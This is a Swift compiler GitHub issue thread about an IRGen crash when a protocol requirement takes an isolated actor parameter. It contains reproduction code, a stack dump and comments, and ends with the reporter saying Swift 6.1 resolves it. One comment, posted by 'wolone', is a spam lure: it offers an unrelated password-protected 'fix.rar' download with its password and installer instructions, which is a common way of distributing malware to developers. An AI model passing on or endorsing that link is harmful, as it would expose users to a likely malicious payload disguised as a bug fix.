### ISSUE TITLE
Crash on IRGen with isolated parameter from protocol requirement

### ISSUE THREAD

**Issue by khlopko** [swiftlang/swift#76087]
### Description

Unfortunately, I cannot share the whole code that reproduces the issue, because so far I was able to reproduce it within the main project, and pulling out components that involved into the issue doesn't reproduce the crash. I had to strip down everything from the crash as well that relates to the project code.

### Reproduction

This is the main parts that are involved into a crash, they don't give a crash as standalone, but replicate most of the original code. Implementation of delegate functions are almost identical here. Compiler crashes for `didComplete` function in implementation.

```swift
protocol OperationDelegate<Value>: AnyObject {
    associatedtype Value

    func didFail(for value: Value, with error: any Error)
    func didComplete(with value: Value, in isolation: isolated any Actor)
}

final class SomeClass: OperationDelegate {
    struct SomeValue {
    }

    typealias Value = SomeValue

    private var completedItems: [Value] = []
    private var errors: [any Error] = []

    func didFail(for value: Value, with error: any Error) {
        errors.append(error)
        print(error)
    }

    func didComplete(with value: Value, in isolation: isolated any Actor) {
        completedItems.append(value)
    }
}
```

### Stack dump

```text
1.	Apple Swift version 6.0 (swiftlang-6.0.0.9.10 clang-1600.0.26.2)
2.	Compiling with the current language version
3.	While evaluating request IRGenRequest(IR Generation for file)
4.	While emitting IR SIL function "...OperationDelegateA2aDP11didComplete3for2in_y6EntityQz_So11NSOperationCScA_pYitYaKFTW".
 for 'didComplete(for:in:_:)'
Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var `LLVM_SYMBOLIZER_PATH` to point to it):
0  swift-frontend           0x00000001063070fc llvm::sys::PrintStackTrace(llvm::raw_ostream&, int) + 56
1  swift-frontend           0x0000000106305350 llvm::sys::RunSignalHandlers() + 112
2  swift-frontend           0x00000001063076c8 SignalHandler(int) + 292
3  libsystem_platform.dylib 0x000000019c8dd184 _sigtramp + 56
4  swift-frontend           0x00000001012fb2d8 (anonymous namespace)::IRGenSILFunction::visitSILBasicBlock(swift::SILBasicBlock*) + 37740
5  swift-frontend           0x00000001012f0c50 (anonymous namespace)::IRGenSILFunction::emitSILFunction() + 13220
6  swift-frontend           0x00000001012ed408 swift::irgen::IRGenModule::emitSILFunction(swift::SILFunction*) + 2088
7  swift-frontend           0x000000010113b0a4 swift::irgen::IRGenerator::emitLazyDefinitions() + 4872
8  swift-frontend           0x00000001012a4d4c swift::IRGenRequest::evaluate(swift::Evaluator&, swift::IRGenDescriptor) const + 4964
9  swift-frontend           0x00000001012ec954 swift::SimpleRequest<swift::IRGenRequest, swift::GeneratedModule (swift::IRGenDescriptor), (swift::RequestFlags)9>::evaluateRequest(swift::IRGenRequest const&, swift::Evaluator&) + 176
10 swift-frontend           0x00000001012adb3c swift::IRGenRequest::OutputType swift::Evaluator::getResultUncached<swift::IRGenRequest, swift::IRGenRequest::OutputType swift::evaluateOrFatal<swift::IRGenRequest>(swift::Evaluator&, swift::IRGenRequest)::'lambda'()>(swift::IRGenRequest const&, swift::IRGenRequest::OutputType swift::evaluateOrFatal<swift::IRGenRequest>(swift::Evaluator&, swift::IRGenRequest)::'lambda'()) + 784
11 swift-frontend           0x00000001012a7574 swift::performIRGeneration(swift::FileUnit*, swift::IRGenOptions const&, swift::TBDGenOptions const&, std::__1::unique_ptr<swift::SILModule, std::__1::default_delete<swift::SILModule>>, llvm::StringRef, swift::PrimarySpecificPaths const&, llvm::StringRef, llvm::GlobalVariable**) + 180
12 swift-frontend           0x0000000100cb685c generateIR(swift::IRGenOptions const&, swift::TBDGenOptions const&, std::__1::unique_ptr<swift::SILModule, std::__1::default_delete<swift::SILModule>>, swift::PrimarySpecificPaths const&, llvm::StringRef, llvm::PointerUnion<swift::ModuleDecl*, swift::SourceFile*>, llvm::GlobalVariable*&, llvm::ArrayRef<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>>) + 156
13 swift-frontend           0x0000000100cb2088 performCompileStepsPostSILGen(swift::CompilerInstance&, std::__1::unique_ptr<swift::SILModule, std::__1::default_delete<swift::SILModule>>, llvm::PointerUnion<swift::ModuleDecl*, swift::SourceFile*>, swift::PrimarySpecificPaths const&, int&, swift::FrontendObserver*) + 2176
14 swift-frontend           0x0000000100cb0f74 swift::performCompileStepsPostSema(swift::CompilerInstance&, int&, swift::FrontendObserver*) + 984
15 swift-frontend           0x0000000100cb4228 performCompile(swift::CompilerInstance&, int&, swift::FrontendObserver*) + 1680
16 swift-frontend           0x0000000100cb2f58 swift::performFrontend(llvm::ArrayRef<char const*>, char const*, void*, swift::FrontendObserver*) + 3572
17 swift-frontend           0x0000000100c3a01c swift::mainEntry(int, char const**) + 3680
18 dyld                     0x000000019c523274 start + 2840
```

### Expected behavior

No crash.

### Environment

swift-driver version: 1.115 Apple Swift version 6.0 (swiftlang-6.0.0.9.10 clang-1600.0.26.2)
Target: arm64-apple-macosx15.0

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scottasoutherland** [comment]
I'll note that making `EventUploadCadence` constrained to `AnyObject` and changing `EventUploadCadenceMock` to be a class does make the crash no longer happen.

**Comment by scottasoutherland** [comment]
After looking at this some more, i discovered my issue was that the protocol `init` was marked as `async` but the implementation was not marked as init. Not sure why this compiled in Xcode 15. But an error would be nice rather than a crash. I don't think it's this same issue anymore, so i'll file a separate bug.

**Comment by khlopko** [comment]
Resolved with 6.1
```sh
swift-driver version: 1.120.5 Apple Swift version 6.1 (swiftlang-6.1.0.110.21 clang-1700.0.13.3)
Target: arm64-apple-macosx15.0
```
